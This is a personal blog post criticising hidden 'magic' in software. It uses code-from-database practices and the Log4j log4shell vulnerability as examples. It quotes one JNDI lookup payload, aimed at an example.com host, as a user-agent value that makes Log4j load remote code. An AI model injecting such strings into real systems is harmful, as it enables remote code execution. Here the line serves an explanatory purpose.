2021-12-19

The Perils of Programming Magic

Abstractions are a necessary part of software development. Not having them would make certain things ridiculous.

Imagine building an e-commerce store for books and writing code for each title instead of just having code for the concept of “book” and reusing it for all titles.

The very concept of a “user” in any application is also an abstraction. We wouldn’t write code for every person that signs up to use our system.

Abstractions provide conveniences that make software development possible.

But like most things in life, we can always take a good thing too far. Sometimes, the conveniences we chase aren’t worth the cost or risk.

A good example of this is putting code in a database. I’ve seen a PHP application load more PHP code from a database and then execute it immediately. I’ve also had a marketing person, with enough coding ability to be dangerous, request execution of Javascript code they put into a CMS.

The only logical reason to perform either of these tasks is for convenience. Putting code into source control, getting it reviewed, testing it, and deploying it is a process. Putting code in a database conveniently avoids that process.

Except! That process exists for a damn good reason.

The process makes sure that the code actually works. It makes sure we can trace the history of that code. It makes sure we can rollback the code to a working state if we ever ship something horribly broken.

Bypassing this process for convenience is a terrible idea.

Let’s look at another example of more recent events: the series of vulnerabilities in Log4j.

Log4j is a logging library. If I want my application to save some text to a log, I can tell Log4j to do so. It provides some nice conveniences by letting me set some messages as errors and some as debug. This let’s me configure things to display more log messages when I’m developing which can help me with my development. It also let’s me configure things to not display these messages in production so my production logs aren’t cluttered with unnecessary messages.

It is simple yet useful functionality, which is why the library is used so widely.

The problem is the additional magic that is added to it.

The first major vulnerability discovered last week was the log4shell issue. A reasonable thing to log is the user-agent for a visitor to your web application. This let’s us know important information like what browser people are using.

log.info("Request User Agent:{}", userAgent);

Unfortunately, Log4j also parsed this text for special markers to perform additional logic on. If someone set their user agent to ${jndi:ldap://example.com/a}, Log4j would effectively load code from that URL.

When most developers need a message logged, they just want that message logged. Anything additional is an edge case at best. Those developers are usually not expecting additional “magic” to come into effect with their logging.

This situation would have been a lot better if there was less magic and the logic was split into explicit functions.

userAgent = log.jndiLookup(userAgent);
log.info("Request User Agent:{}", userAgent);

When splitting up the function, it becomes clear to the programmer that they need to actually sanitize the text in some way or verify the url. Everyone who doesn’t need that functionality is safer with a simple logging function. Everyone who does need that functionality can still access it with slightly less convenience.

Combing this logic into a single function created a number of issues. What could have been simple code was suddenly a lot more complex. People who thought they were using a simple function were unaware of that complexity. Side effects were inevitable and in this case those side effects came in the form of a major security vulnerability.

This is why I don’t think the primary problem here was technical. The symptom of the security issue was technical. The real problem is the philosophy of what we consider to be good code. Many would consider good code to be being able to implement something while writing as few lines of code as possible. The result of this is programming magic.

I prefer to have code be more explicit like in the example above. Writing code that is explicit does result in more lines of code, but it is easier to understand and easier to work with.

Hi there! I hope you enjoyed this post.

I keep this blog around for posterity, but have since moved on. An explanation can be found here

I still write though and if you'd like to read my more recent work, feel free to subscribe to my substack.

Professor Beekums Blog

The Perils of Programming Magic